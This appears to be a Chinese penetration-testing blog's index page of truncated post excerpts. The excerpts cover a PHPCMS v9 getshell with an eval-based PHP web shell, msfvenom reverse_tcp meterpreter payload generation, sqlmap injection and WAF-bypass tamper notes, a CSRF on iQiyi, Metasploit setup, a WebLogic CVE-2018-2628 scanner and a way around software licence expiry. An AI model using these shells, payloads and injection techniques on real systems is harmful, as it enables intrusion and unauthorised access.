渗透测试

[笔记]通杀PHPCMSv9 getshell

小结下: 菜刀马不能用get方式。开始一直失败~~~上传上去了,显示却是自己服务器的shell~~弄了好久终于好了~~ 菜刀马: <?php @eval($_POST[...继续阅读 »
渗透测试

爱奇艺游戏风云榜,电视剧,电影CSRF之你点击就收藏(官方SRC已忽略)

保存笔记而已~~~~~~ 本文涉及业务URL如下 1.http://top.iqiyi.com/youxi.html 2.http://www.iqiyi.com/u/fav 本文涉及漏洞URL...继续阅读 »
软件相关

解决Xshell和Xftp评估过期

在百度下载的XFTP和XSHELL是国内代理奸商。。。。。。 然而过了大概几个月或者几周后,就会提示你,评估期已过,需要购买。。。 最重要的是,我安装选择的个人或者学校使用。。。还是会提示购...继续阅读 »
渗透测试

msfvenom生成各种Payload命令

msfvenom -l 列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<...继续阅读 »
教程相关

修改Emlog后台默认登录路径+后台密码传输加密

修改后台管理员登陆地址: 1、修改根目录下admin的名称 2、找到admin/globals.php中的代码 define('TEMPLATE_PA...继续阅读 »
渗透测试

SQLmap笔记---持续更新

sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 sqlmap -u http://www.baidu.com/news...继续阅读 »
渗透测试

SQLmap注入之tamper绕过WAF防火墙过滤

每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多...继续阅读 »
渗透测试

【原创】利用腾讯云服务器低成本搭建外网Metasploit

本教程在腾讯云Ubuntu Server 16.04.1 LTS 64位上测试通过 登录到Ubuntu系统后,首先切换成root用户 sudo su 关闭防火墙:ufw disable  记得...继续阅读 »
渗透测试

weblogic最新漏洞反序列化漏洞CVE-2018-2628-批量检测脚本

脚本如下 #coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' ...继续阅读 »
sitemap